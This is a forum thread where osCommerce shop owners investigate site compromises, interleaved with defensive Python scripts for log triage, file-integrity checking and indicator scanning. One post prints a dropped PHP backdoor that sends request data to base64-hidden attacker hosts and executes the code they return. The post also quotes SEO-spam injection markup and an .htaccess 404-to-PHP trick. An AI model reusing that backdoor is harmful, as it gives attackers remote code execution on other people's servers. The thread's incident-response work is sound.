osCommerce

Hacker attacks

dandelion
Does anyone know how to stop the repeated hacker attacks we are getting. I've had several osC sites attacked recently- one site repeatedly.

 

This is added to the bottom of index.php with tons of links....

 

<!--dd4--><font style="position: absolute;overflow: hidden;height: 0;width: 0">links to porn and other stufff have been removed from code here XGHSLJJ2103@katok_05.05</font></body></html><!--dd5-->

 

They also upload an index file into the the images folder and images.

 

Sometimes they just upload a index.html file to the root so that the site shows their file instead of the index.php file.

 

How are they doing this?

oh jesus.. hope this solved for all of us!

 

I'll keep eyes on this 1

 

Thanks for the head up

 


Who are you hosting with? Have you talked to them? There may be a problem with their configuration that allows other customers to access your area of a shared server. You might also take a look at your server logs, as this may be able to tell you where the attacks are coming from and what exactly they are doing.

 

In the meantime, I'd change all of your passwords and take a careful look at everything on your site. If it's happening repeatedly, even after changing passwords, either they've somehow installed a backdoor application to give them access or your host needs to change their security policies. You might also consider removing admin/file_manager.php, as this could be used to access the site remotely.

 

There's a contribution called 'Site Monitor', I think, that could be used to alert you of changes like this as well. That might help you in narrowing down the time frame to look in the server logs when it happens again.

 

And finally, I'd find out who the porn site is being hosted by and contact them as well. It's obvious who is doing it, and that hosting company may be convinced to send them a warning that if they continue their account can be cancelled. This may not work, but it's worth a try. They could, after all, be named in any legal action you may want to bring against the perpetrators. (Although winning a lawsuit would be an uphill battle, the threat of one is sometimes enough.)

 

Good luck!


Me too! Discovered that .htaccess files had been created in several places:

 

/catalog/images

/catalog/images/icons

/catalog/images/infobox

 

Each contained something similar to this:

 

Options -MultiViews

ErrorDocument 404 //catalog/images/136008.php

 

Permissions had been changed on many files.

Some images are now 0 bytes in length.

 

But it gets worse...

 

I checked my web log files and found several search engines trying repeatedly to access files such as:

 

61.135.162.212 - - [06/May/2008:19:26:45 -0500] "GET /tmp269/index.php?pg=amateur-british-nude.htm HTTP/1.1" 404 1544 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"

74.6.19.90 - - [06/May/2008:19:27:17 -0500] "GET /tmp269/index.php?pg=amateur-boxing-matches.htm HTTP/1.0" 404 1544 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

64.124.85.72 - - [06/May/2008:21:49:13 -0500] "GET /tmp269/index.php?pg=amateur-british-couples.htm HTTP/1.1" 404 1544 "-" "Mozilla/5.0 (compatible; BecomeBot/3.0; +http://www.become.com/site_owners.html)"

209.234.171.37 - - [07/May/2008:01:49:35 -0500] "GET /tmp269/index.php?pg=amateur-breast-galleries.htm HTTP/1.0" 404 1544 "-" "ia_archiver"

202.141.117.91 - - [07/May/2008:02:09:29 -0500] "GET /catalog/images/banners/coreeditor+crack.html HTTP/1.0" 403 1228 "http://www.google.co.in/search?hl=en&q=free+downloding+pdf+to+word&btnG=Google+Search&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

66.249.65.226 - - [08/May/2008:03:31:07 -0500] "GET /tmp269/index.php?pg=amateur-bra-pictures.htm HTTP/1.1" 404 1544 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

 

(The list is mind-numbing...) But I digress.

 

I also found referrers from other sites:

 

64.27.5.162 - - [08/May/2008:10:23:53 -0500] "HEAD /tmp269/index.php?pg=amateur-brat-porn.htm HTTP/1.1" 404 0 "http://www.blackoakbooks.com/" "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0;)"

 

So, I went to www.blackoakbooks.com and viewed the source for their home page:

 

Sure enough, there it was:

 

<!--dd4--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href='http://ppphotography.com.au/tmp297/amateur-radio-hustory.htm' title='amateur radio hustory'>amateur radio hustory</a> <a href='http://school.stjosephbristol.org/tmp494/angel-teen-forum.htm' title='angel teen forum'>angel teen forum</a> <a href='http://wholerestmusic.com/tmp450/asian-bank-philadelphia.htm' title='asian bank philadelphia'>asian bank philadelphia</a> <a href='http://gamesandlottos.com/tmp411/teen-cumming-panties.htm' title='teen cumming panties'>teen cumming panties</a> <a href='http://clips.prrag.com/tmp381/gay-teens-leather.htm' title='gay teens leather'>gay teens leather</a> <a href='http://midnight.thegeekosphere.com/tmp14/gay-porn-blowjob.htm' title='gay porn blowjob'>gay porn blowjob</a> <a href='http://zmilliondollars.com/tmp446/hdroxycut-hardcore-reviews.htm' title='hdroxycut hardcore reviews'>hdroxycut hardcore reviews</a> <a href='http://casinogamblersguide.com/tmp290/gay-sex-gallery.htm' title='gay sex gallery'>gay sex gallery</a> <a href='http://egyptiancastle.com/tmp163/pussys-up-close.htm' title='pussys up close'>pussys up close</a> <a href='http://hotoilstocks.com/tmp255/amateur-eva-shine.htm' title='amateur eva shine'>amateur eva shine</a> <a href='http://tangledupinblues.com/tmp285/latest-teen-fashion.htm' title='latest teen fashion'>latest teen fashion</a> <a href='http://cybersteps.org/tmp300/asian-ass-clips.htm' title='asian ass clips'>asian ass clips</a> <a href='http://rachel.swenton.com/tmp2/female-sucking-pussy.htm' title='female sucking pussy'>female sucking pussy</a> <a href='http://innatedetroit.com/tmp346/pics-of-pussy.htm' title='pics of pussy'>pics of pussy</a> <a href='http://pinoy-blog.isoftinno.com/tmp206/penis-into-pussy.htm' title='penis into pussy'>penis into pussy</a> <a href='http://perk.no/tmp455/midnight-pussy-208.htm' title='midnight pussy 208'>midnight pussy 208</a> <a href='http://labarca.org/tmp253/asian-mix-uk.htm' 
title='asian mix uk'>asian mix uk</a> <a href='http://oceanohana.com/tmp445/gay-photo-story.htm' title='gay photo story'>gay photo story</a>

 

(OK, you get the idea. Literally hundreds of entries, including links to my web site.)

 

The telltale signature at the end of the file:

 

<a href='http://cluboholics.com/tmp166/asian-porn-thumbnails.htm' title='asian porn thumbnails'>asian porn thumbnails</a> XGHSLJJ2103@katok_05.05</font></body></html><!--dd5-->

 

= = = = = = = = =

 

I have since alerted the webmasters of several of these sites to let them know that they have been hacked.

I have also removed the offending content from my web site.

 

But I do not want to have to do full directory tree searches manually on a daily basis to determine if it has happened again.

 

In the TMI Department, this coincided with another attack that was what first brought it to my attention.

My web hosting company sent me an email stating that I had phishing content on my site.

 

An entire directory structure had been mysteriously inserted into my web site:

 

/catalog/images/infobox/corner_right/Thumb/imexplorer/Static-SelfDirected/execute/wealthmanagement/

 

Underneath it was a Wells Fargo page, complete with logos, ads, etc., and a username and password login screen.

 

I have removed this also, but someone is interested in it (about 10 minute intervals):

 

66.16.13.14 - - [04/May/2008:19:05:13 -0500] "GET /catalog/images/infobox/corner_right/Thumb/imexplorer/Static-SelfDirected/execute/wealthmanagement/index.htm HTTP/1.1" 404 - "-" "libwww-perl/5.803"

 

Sorry this was so long, but I feel that it is important enough to be verbose.

 

Anyone have any ideas what the vulnerability is here?

How are they getting in? It appears to be scripted, so it may have a wide distribution base.
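Added example (my code, not part of this thread): a Python triage script for Apache combined-format access logs shaped like the excerpt above. It flags the request patterns the poster describes: crawlers chasing the injected /tmpNNN/ paths, scripted clients polling the removed phishing directory, and, because it shows up later in this thread on the "who's online" page, a URL smuggled into a query-string value (the products_id=http://... probe). It then summarises hit counts and client IPs per indicator. The lines in SAMPLE_LOG are constructed for the example (RFC 5737 documentation IPs, placeholder page names); the indicator regexes are my choice, not something from osCommerce or any add-on.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" log format, the shape of the lines quoted in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from what the posters saw. The regexes themselves are my choice.
TMP_DIR_RE = re.compile(r'^/tmp\d+/')                        # injected /tmpNNN/ spam directories
URL_IN_QUERY_RE = re.compile(r'[?&][^=&]+=https?://', re.I)  # a URL passed as a parameter value
PHISH_PATH = ('/catalog/images/infobox/corner_right/Thumb/imexplorer/'
              'Static-SelfDirected/execute/wealthmanagement/')  # removed phishing tree quoted above
SCRIPTED_UA_RE = re.compile(r'libwww-perl|curl/|wget/|python-requests', re.I)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Return the indicator tags that apply to one parsed request (possibly several)."""
    tags = []
    if TMP_DIR_RE.match(rec['path']):
        tags.append('spam-dir')
    if URL_IN_QUERY_RE.search(rec['path']):
        tags.append('url-in-param')
    if rec['path'].startswith(PHISH_PATH):
        tags.append('phish-path')
    if SCRIPTED_UA_RE.search(rec['ua']):
        tags.append('scripted-client')
    return tags


def triage(lines):
    """Summarise a log: hit counts per indicator, client IPs per indicator, and the flagged requests."""
    counts = Counter()
    ips = defaultdict(set)
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:          # not combined format (rotated header, truncated line): skip, do not crash
            continue
        tags = classify(rec)
        if tags:
            flagged.append((rec['ip'], rec['status'], tuple(tags), rec['path']))
        for tag in tags:
            counts[tag] += 1
            ips[tag].add(rec['ip'])
    return {'counts': dict(counts), 'ips': {t: sorted(v) for t, v in ips.items()}, 'flagged': flagged}


# Constructed sample (same shape as the excerpt above; RFC 5737 documentation IPs, placeholder page names).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2008:19:26:45 -0500] "GET /tmp269/index.php?pg=page-one.htm HTTP/1.1" 404 1544 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"',
    '198.51.100.7 - - [06/May/2008:19:27:17 -0500] "GET /tmp269/index.php?pg=page-two.htm HTTP/1.0" 404 1544 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"',
    '203.0.113.5 - - [04/May/2008:19:05:13 -0500] "GET /catalog/images/infobox/corner_right/Thumb/imexplorer/Static-SelfDirected/execute/wealthmanagement/index.htm HTTP/1.1" 404 - "-" "libwww-perl/5.803"',
    '203.0.113.9 - - [07/May/2008:02:10:00 -0500] "GET /product_info.php?products_id=http://example.invalid/images/imag HTTP/1.1" 200 8120 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.44 - - [07/May/2008:02:11:00 -0500] "GET /index.php HTTP/1.1" 200 12010 "-" "Mozilla/5.0"',
    'this line is not in combined format and is skipped',
]

if __name__ == '__main__':
    result = triage(SAMPLE_LOG)
    for ip, status, tags, path in result['flagged']:
        print('%-14s %s %-28s %s' % (ip, status, ','.join(tags), path))
    print(result['counts'])
```

Run it against a real log with `triage(open('access_log').readlines())`. The spam-dir hits are mostly search-engine crawlers following links planted on other compromised sites, so they tell you what was injected, not who did it; the scripted-client and url-in-param hits are the ones worth correlating with file timestamps.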

Wow. It's fascinating how much work they go through. Thanks for all the detail, it's very interesting to me.

 

I have the same question for you as the other poster: who are you hosting with? Have you contacted them and told them about this? They should be able to look at server logs to determine when and how this happened. Ultimately, it's your responsibility to ensure security on your site, but they should be able to help you in figuring out where you are vulnerable (and they may have more experience in this area than you do). Look through your server logs and see what they can tell you. The time stamps of the files added to your site should give you an idea of what time frame to look in your logs.

 

If I were you, I'd do the following:

- change all passwords... to your control panel, database, FTP, everything.

- remove the admin/file_manager.php file. This could give them a back door and you really don't need it anyway.

- double check the permissions on all directories. Make sure they are not publicly writable.

 

There is a Site Monitor contribution, http://addons.oscommerce.com/info/4441, which might give you a heads-up in the future if this happens again and give you an idea of what they have done.

 

And if you do find out anything from your host about this, please report back. I know that I'd love to hear more about how this could be done so that I can protect my own site and those of my clients.

 

Best of luck to you.
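Added example, my code rather than the thread's or the Site Monitor add-on's: the core of what such a monitor does. A baseline of SHA-256 digests, sizes and permission bits is taken once from a clean tree and stored outside the web root; each later run is compared against it, so added files (a dropped .htaccess or .php), modified files (the hidden-link block appended to index.php) and permission changes (a directory flipped to 777) are reported without walking the tree by hand. demo() builds a small constructed web root, tampers with it the way this thread describes, and returns the comparison.

```python
import hashlib
import json
import os
import shutil
import stat
import tempfile


def _digest(path, st):
    """SHA-256 of a file's bytes; for a symlink, of its target string (the link itself is the artefact)."""
    if stat.S_ISLNK(st.st_mode):
        return hashlib.sha256(os.readlink(path).encode()).hexdigest()
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Record digest, size and permission bits for every file under root, and the
    permission bits of every directory (keys ending in '/'), relative to root."""
    snap = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, '/')
        st = os.lstat(dirpath)
        snap[rel_dir + '/'] = {'mode': stat.S_IMODE(st.st_mode), 'sha256': None, 'size': None}
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            rel = name if rel_dir == '.' else rel_dir + '/' + name
            snap[rel] = {'mode': stat.S_IMODE(st.st_mode), 'sha256': _digest(full, st), 'size': st.st_size}
    return snap


def compare(baseline, current):
    """Diff two snapshots into sorted lists: added, removed, modified (content), mode_changed (permissions)."""
    report = {'added': [], 'removed': [], 'modified': [], 'mode_changed': []}
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            report['added'].append(path)
        elif path not in current:
            report['removed'].append(path)
        else:
            b, c = baseline[path], current[path]
            if (b['sha256'], b['size']) != (c['sha256'], c['size']):
                report['modified'].append(path)
            if b['mode'] != c['mode']:
                report['mode_changed'].append(path)
    return report


def save_baseline(snap, path):
    """Store the reference. Keep it outside the web root and not writable by the web
    server user: an attacker who can drop files into the site must not be able to
    rewrite the baseline they are measured against."""
    with open(path, 'w') as f:
        json.dump(snap, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed web root: baseline it, apply the tampering described in this thread, report."""
    root = tempfile.mkdtemp()
    try:
        images = os.path.join(root, 'catalog', 'images')
        backups = os.path.join(root, 'admin', 'backups')
        os.makedirs(images)
        os.makedirs(backups)
        os.chmod(backups, 0o755)
        index_php = os.path.join(root, 'catalog', 'index.php')
        with open(index_php, 'w') as f:
            f.write('<?php echo "shop"; ?>\n')
        with open(os.path.join(images, 'logo.gif'), 'wb') as f:
            f.write(b'GIF89a')
        baseline = snapshot(root)

        # Tampering: hidden-link block appended, .htaccess + PHP dropped into images, backups opened to 777.
        with open(index_php, 'a') as f:
            f.write('<!--dd4--><font style="height: 0;width: 0">spam</font></body></html><!--dd5-->\n')
        with open(os.path.join(images, '.htaccess'), 'w') as f:
            f.write('Options -MultiViews\nErrorDocument 404 //catalog/images/136008.php\n')
        with open(os.path.join(images, '136008.php'), 'w') as f:
            f.write('<?php /* dropped */ ?>\n')
        os.chmod(backups, 0o777)
        return compare(baseline, snapshot(root))
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    print(json.dumps(demo(), indent=1))
```

In production you would call `save_baseline(snapshot('/path/to/htdocs'), '/home/you/private/site.baseline.json')` once after a clean install, then run `compare(load_baseline(...), snapshot(...))` from cron and mail the result when any list is non-empty. Hashing rather than timestamps matters here: the poster's images were zeroed and permissions changed, and an attacker who can write a file can also reset its mtime.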

This happened to me back in March.

 

My educated guess is it was because the images folder was at "777" permissions (My bad!! :blush: ).

 

I've since lowered it to "755" and (fingers crossed) no more hack.

 

After I changed it to "755" I remembered why it was that way.

 

If I have it at "755", osC Admin couldn't write to the images folder.

 

Long story short, I installed a contribution called osC FileBrowser. The guy I set the site up for uses Frontpage to upload images, then the Admin uses the contrib. to find them in the images folder.

 

You might check your /admin/backups folder. They planted something there on our site...

:blush:


Oh I should have said that I now set my index.php file permissions to 444 when I'm not working on the site - this prevents the hidden text problem.

 

All permissions are set as they should be according to osCommerce Knowledge Base


THANKS! yes there is a new file in backups .... 209639.php - WHY do people waste their life energy in such a negative way? I just don't get it!


Yup. /admin/backups was 777. (didn't use to be.)

 

Found these:

/admin/backups/.htaccess

 

Options -MultiViews

ErrorDocument 404 //admin/backups/14740.php

 

Options -MultiViews

ErrorDocument 404 //admin/backups/90032.php

 

 

14740.php

 

<?
error_reporting(0);
$s = "e";
// Collect request details, using the $_SERVER names and falling back to the old register_globals names
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$i = (isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
$j = (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
// Pack everything, base64-encoded and dot-separated, into a query string for the remote controller
$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "."
     . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h)
     . ".$s." . base64_encode($i) . "." . base64_encode($j);
// Fetch and execute whatever the controller returns: first include() of a URL (needs allow_url_include),
// then a second host, then file_get_contents() + eval(), then curl + eval()
if ((include(base64_decode("aHR0cDovLw==") . base64_decode("d3d3My5yc3NuZXdzLndz") . "/?" . $str))) {
} else if (include(base64_decode("aHR0cDovLw==") . base64_decode("d3d3My54bWxkYXRhLmluZm8=") . "/?" . $str)) ;
else if ($c = file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/") . $str)) eval($c);
else {
    $cu = curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/") . $str);
    curl_setopt($cu, CURLOPT_RETURNTRANSFER, 1);
    $str = curl_exec($cu);
    curl_close($cu);
    eval($str);
};
?>

 


 

 

 

Did a little research...

 

A quick trip to an online base64 decoder...

 

aHR0cDovLw==                  =>  http://

d3d3My5yc3NuZXdzLndz          =>  www3.rssnews.ws

d3d3My54bWxkYXRhLmluZm8=      =>  www3.xmldata.info

aHR0cDovLzcucnNzbmV3cy53cy8/  =>  http://7.rssnews.ws/?

 

Googled that...

 

Seems to have been around a while:

 

References go all the way back to March, 2007...

(Mar. 2007) http://www.pivotlog.net/forum/viewtopic.ph...66a8e397ec9a4e1

(Aug. 2007) http://codyprecord.com/?q=en/node/22

(Sep. 2007) http://www.chargertek.com/smf/viewtopic.php?f=36&t=1621

(Oct. 2007) http://www.webhostingtalk.com/showthread.php?t=642227

 

To make a short story long, they find a world-writable directory and plop in these files.

By utilizing the .htaccess file, and referring to a PHP file instead of a 404 .htm page,

all they have to do now is try to access a file in that directory that doesn't exist. Easy.

The PHP script runs, and it can do anything now, because it is being run by your own PHP server, as you.

 

Look for files in your main domain folder, such as /tmp456

 

I had several of these, which included:

 

index.php

keysr.txt

keyst.txt

nickr.txt

page.tpl

w1.txt

w2.txt

w3.txt

w4.txt

 

If you are interested in their contents, I can forward them to you.

Just let me say that all roads lead to porno, and a site in Russia.

 

Now I am left with trying to clean up the mess left behind...

Broken links, missing files, modified file/directory attributes,

not to mention hundreds (thousands?) of links to non-existent pages on my site,

scattered about the Net, and being referenced by all the major search engines... sheesh.

 

Check your logs. Double check your file permissions. Look for foreign content.

And one other thing I might have to do, find a web hosting provider that doesn't share servers.
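Added example (my code, not from the thread): a scanner for the specific indicators this post lays out. It walks a web root and reports world-writable directories, .htaccess files whose ErrorDocument hands a 404 to a .php file, PHP files sitting in directories that should only hold images or backups (decoding any base64_decode("...") literals inside them, the way the poster did by hand, so the controller hostnames come out in the report), planted tmpNNN directories, the <!--dd4-->...<!--dd5--> hidden-link block in index.php, and a stray index.html in the root or an images folder. The tree built in demo() is constructed for the example; the dropper stand-in in it keeps the shape of the script quoted above but points at www.example.invalid instead of the real hosts.

```python
import base64
import os
import re
import shutil
import stat
import tempfile

# Directories in an osCommerce tree that should contain no executable PHP at all.
NO_PHP_DIRS = {'images', 'backups'}
# .htaccess line that hands an error response to a PHP file: the trick described above.
ERRORDOC_PHP_RE = re.compile(r'^\s*ErrorDocument\s+\d{3}\s+(\S+\.php\S*)', re.I | re.M)
# base64_decode("...") literals, as used by the dropper to hide its controller hostnames.
B64_LITERAL_RE = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# The hidden-link block appended to index.php in this thread.
MARKER_RE = re.compile(r'<!--dd4-->.*?<!--dd5-->', re.S)
TMP_DIR_RE = re.compile(r'^tmp\d+$')


def read_text(path):
    with open(path, encoding='utf-8', errors='replace') as f:
        return f.read()


def write_text(path, text):
    with open(path, 'w') as f:
        f.write(text)


def decode_literals(php_source):
    """Decode every base64_decode("...") literal in a PHP source string.
    Literals that are not valid base64 are reported instead of aborting the scan."""
    out = []
    for lit in B64_LITERAL_RE.findall(php_source):
        try:
            out.append(base64.b64decode(lit, validate=True).decode('utf-8', 'replace'))
        except Exception:
            out.append('<undecodable:%s>' % lit)
    return out


def scan(root):
    """Walk root and return sorted (kind, relative path, detail) findings."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, '/')
        in_static = bool(set(rel_dir.split('/')) & NO_PHP_DIRS)
        mode = stat.S_IMODE(os.lstat(dirpath).st_mode)
        if mode & stat.S_IWOTH:                      # the drop point the attacker needs
            findings.append(('world-writable-dir', rel_dir, '%o' % mode))
        if TMP_DIR_RE.match(os.path.basename(dirpath)):
            findings.append(('planted-tmp-dir', rel_dir, ''))
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = name if rel_dir == '.' else rel_dir + '/' + name
            if name == '.htaccess':
                for target in ERRORDOC_PHP_RE.findall(read_text(full)):
                    findings.append(('errordocument-to-php', rel, target))
            if in_static and name.lower().endswith(('.php', '.phtml')):
                hosts = ' '.join(decode_literals(read_text(full)))
                findings.append(('php-in-static-dir', rel, hosts))
            if name == 'index.php' and MARKER_RE.search(read_text(full)):
                findings.append(('hidden-link-block', rel, ''))
            if name == 'index.html' and (rel_dir == '.' or in_static):
                findings.append(('unexpected-index-html', rel, ''))
    return sorted(findings)


def demo():
    """Build a constructed web root showing every indicator from this thread, scan it, clean up."""
    root = tempfile.mkdtemp()
    try:
        images = os.path.join(root, 'catalog', 'images')
        backups = os.path.join(root, 'admin', 'backups')
        tmpdir = os.path.join(root, 'tmp456')
        for d in (images, backups, tmpdir):
            os.makedirs(d)
        for d in (os.path.join(root, 'catalog'), images, os.path.join(root, 'admin'), backups, tmpdir):
            os.chmod(d, 0o755)               # sane default so only the deliberate 777 is reported
        os.chmod(backups, 0o777)
        write_text(os.path.join(images, '.htaccess'),
                   'Options -MultiViews\nErrorDocument 404 //catalog/images/136008.php\n')
        # Stand-in for the dropper: same shape as the quoted script, controller replaced by a documentation name.
        host_lit = base64.b64encode(b'www.example.invalid').decode()
        write_text(os.path.join(backups, '14740.php'),
                   '<? include(base64_decode("aHR0cDovLw==").base64_decode("%s")."/?".$str); ?>' % host_lit)
        write_text(os.path.join(root, 'catalog', 'index.php'),
                   '<?php ?>\n<!--dd4--><font style="height: 0;width: 0">spam</font></body></html><!--dd5-->')
        write_text(os.path.join(root, 'index.html'), '<h1>defaced</h1>')
        return scan(root)
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for kind, path, detail in demo():
        print('%-22s %-32s %s' % (kind, path, detail))
```

Point `scan()` at the real document root to get the same report for a live site. The errordocument-to-php finding is the important one: once that line is in place, a request for any nonexistent name in that directory executes the dropped script as the site's own user, which is why removing the .php file alone is not enough; the .htaccess has to go too and the directory has to stop being writable.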


OK, this is getting ridiculous. I've rechecked my permissions, and changed my passwords.

 

Someone is still getting in, presumably from a vulnerability within osCommerce code.

Now, granted, I am on an older version, I believe.

I am not getting any support from my hosting service. That can be fixed...

 

Is there any place I can go to check which version I have, what versions are available,

and what known vulnerabilities have been addressed specifically?

 

Even with permissions on the directory of 547, someone was able to overwrite my .htaccess file.

 

Anyone ever heard of mikandamp.org ? (Some spammer outfit in China...?)


I think your problems are non-osC related. If you search Google for XGHSLJJ2103 you will find many non-osC sites have been hacked with the same thing <!--dd4-->.........XGHSLJJ2103

 

 

If you have the old version 2.1 or upgraded from 2.1, then check for include_once.php

 

http://www.oscommerce.com/about/news,72

 

Thanks but this site is on 2.2 and does not have an include_once.php


I am just checking my website out for problems - this is an example of what I see on the "who's online" page in admin

 

Quote

 

/product_info.php?products_id=http://amygirl.chat.ru/images/imag

 

Unquote

 

I am now just going to check out all the pages mentioned here

Does anyone have any ideas of where I might look otherwise?

 

Thanks

Look for hidden text at the end of your index.php file and look in your images folder for an index.html file. Also look in your backups folder in admin. They got in again last night ... sigh

Sorry for you .... this is a pain - and big worry ...

 

I can't find any text on the index.php file which is out of place (using Beyond Compare 2).

I have changed admin password/ cp password - so not sure what else to do

 

Is it likely the webhoster is not secure enough? Who do you host with?

If there is hidden text you just need to view source and go to the bottom of the page and you'll see it.

 

No this isn't a host problem... The site is with Host Excellence. Here are their comments

 

Thank you for contacting our technical support team!

 

Please note that most hackers' attacks are usually done through vulnerabilities in the website software which you are using (like forums, blogs, CMS, any other PHP-based applications). We cannot keep them secured as we are not the developers of such software.

From our side, all server-side software (web services, FTP services, etc.) we are keeping up to date and protected. It is strongly recommended to review everything that you have in the website folder and check web server logs to determine the way you may protect your application against further intrusions. If you have any widely used software installed, check the vendor site for recent updates or security fixes. Our advice is to contact a qualified webmaster for remedying this problem, since customization and fixing of third-party software falls outside our support boundaries, unfortunately.

So, it is strongly recommended to review everything that you have in the website folder and try to determine the way you may protect your applications. For example, if you have any widely used software installed (forum, blog, etc.), check the vendor site for recent updates or security fixes.

 

Please also note that your files are located on a Linux-based server and you are able to change file/folder permissions, so make sure you do not have any "open" files/folders with write permissions set for all.

So please check if any folders have full permissions (777) set, which means they are world-writable for anyone from the Web. Recommended permissions are 755 or 644.

 

I also recommend you to change your current FTP password through the Control Panel (Manage -> FTP manager -> Password icon). Some widespread trojans have functions to steal FTP passwords from users' local PCs and send these passwords to hackers (or special bots made by hackers). So you need to scan your local PC for viruses (using in-depth scanning) and change your current FTP password.

 

Please feel free to contact us if you need further assistance, we are available 24/7.

Doesn't mean it's not a host issue at all .. they are just pointing the finger at software.


Has any of you tried this contrib to ensure attacks don't get in via $_GET, as has happened in the past?

 

http://addons.oscommerce.com/info/5752

 

You can also use this to check on changes.

 

http://addons.oscommerce.com/info/4441

 

Cheers :)

Sam

 

I have been trying to install site monitor but keep getting errors (see forum topic)

as below

Warning: opendir(/hsphere/local/home/...../.......com/....../backups): failed to open dir: Permission denied in /hsphere/local/home/..../...../..../includes/functions/sitemonitor_functions.php on line 93

 

Warning: readdir(): supplied argument is not a valid Directory resource in /hsphere/local/home/......../........../......./includes/functions/sitemonitor_functions.php on line 95

 

Warning: opendir(/hsphere/local/home/......../........com/....): failed to open dir: Permission denied in /hsphere/local/home/......../..........com/.../includes/functions/sitemonitor_functions.php on line 93

 

Warning: readdir(): supplied argument is not a valid Directory resource in /hsphere/local/home/......./........../......../includes/functions/sitemonitor_functions.php on line 95

 

Warning: fopen(sitemonitor_reference.php): failed to open stream: Permission denied in /hsphere/local/home/......./........./........./includes/functions/sitemonitor_functions.php on line 208

Failed to open file sitemonitor_reference.php

 

obviously edited out user/site/adminfile etc


Looks like it's trying to access the backups directory in admin. Have you created it?

 

Also check path to it in configure.php

 

;)

Sam

 


Okay so now another one of my osCommerce sites was hacked. They just uploaded an index.html file to the root. Replacing site with "Hacked By Ghost 61". I just had to delete the index.html and my index.php file showed the site again. How are they getting in and how can I stop them! My clients are getting really upset!


I would wipe out the server completely.

 

If it's shared hosting, I would just delete everything in the directory... then upload a "clean" version of my clients site.

 

If the hacks continue, contact your hosting provider and request that they look into the issue. If they have a forum on their website, post about your issue and see if anyone else is having the same problem; with or without osCommerce.

 

A hosting company that I use with some of my sites had this issue come up. I caught it because I was going through the logs when I took over the servers. So I called up the hosting company and the guy played dumb until I asked him to look into it further. He came back, "Oh yeah, we had a security breach in November" (mind you it was January). I asked, "Why didn't we get notified of the breach... not a single email or phone call!" Crazy enough, the guy said, "Oh no! This isn't something you want to let everyone know!" I nearly jumped through the phone.

 

Hope you get it all sorted out!


Just found another folder was added May 21 to the root named tmp with some numbers. The same site is a constant target. Some of my other sites have been targeted but then left alone when I clean them up.


Check the folder permissions right away to see if they have been changed.

Also, try to obtain the log files from the webhosting service for FTP as well as the server itself.

They are either sniffing your FTP password, or the CP (control panel).

Otherwise, it is a server hack, and they have serious security issues.

 

My hosting company keeps trying to blame holes in my code (PHP), or the application.

It could be forms processing, such as input fields, but I doubt that.

 

I have seen this same hack outside of osCommerce sites.

 

The sick part is that the garbage this particular hack adds to other sites gets indexed by all of the major search engines,

and they keep trying to access these pages. Once you remove the /tmp/###### garbage, all they get is 404 errors.

But it is annoying that they keep trying. Check your log files as well. The attempted references are nauseating.
